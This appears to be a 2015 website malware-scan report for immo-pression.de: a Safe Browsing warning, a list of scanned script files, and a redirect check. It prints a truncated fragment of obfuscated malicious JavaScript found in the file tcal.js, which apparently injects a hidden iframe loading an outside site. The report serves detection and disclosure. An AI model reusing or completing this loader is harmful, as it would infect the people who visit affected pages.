Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=immo-pression.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.immo-pression.de/ | 200 OK Content-Length: 29486 Content-Type: text/html | clean |
http://www.immo-pression.de/mainmenu/images.js | 200 OK Content-Length: 464 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/tracking.js | 200 OK Content-Length: 2246 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-1.7.1.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:22 GMT Location: http://www.immo-pression.de/403.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/403.php | 403 Forbidden Content-Length: 21393 Content-Type: text/html | clean |
http://www.immo-pression.de/includes/portalconfig/jqueryui/js/jquery-ui-1.8.18.custom.min.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:23 GMT Location: http://www.immo-pression.de/403.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 18 Jan 2015 19:31:23 GMT Location: http://www.immo-pression.de/404.php Server: Apache/2.2.22 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.immo-pression.de/404.php | 404 Not Found Content-Length: 22031 Content-Type: text/html | clean |
http://www.immo-pression.de/javascripts/lade_popup_nonssl_de.js | 200 OK Content-Length: 2869 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/javascripts/lade_funktionen.js | 200 OK Content-Length: 2311 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/includes/portalconfig/kalenderedit/tcal.js | 200 OK Content-Length: 17121 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="s"+"p"+"l"+"i"+"t";asd=function(){++d.body};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,161,176,174,155,161,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,161,176,174,155,161,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,166,171,160,172,176,154,153,154,171,65,153,154,66,153,127,170,122,173,151,152,115,65,167,157,167,56 Antivirus reports:
| ||
http://www.immo-pression.de/admin/ajax/ajax.js | 200 OK Content-Length: 5162 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/ajax-dynamic-list.js | 200 OK Content-Length: 10044 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_geodaten.js | 200 OK Content-Length: 15464 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_suchenkriterien_stadtteile.js | 200 OK Content-Length: 2733 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/admin/ajax/_suchenkriterien.js | 200 OK Content-Length: 3657 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/js/ib.js | 200 OK Content-Length: 855 Content-Type: application/x-javascript | clean |
http://www.immo-pression.de/js/overlib_mini.js | 200 OK Content-Length: 37522 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: immo-pression.de
Result:
GET / HTTP/1.1
Host: immo-pression.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: immo-pression.de
Referer: http://www.google.com/search?q=immo-pression.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: immo-pression.de
Referer: http://www.google.com/search?q=immo-pression.de
Result:
The result is similar to the first query. There are no suspicious redirects found.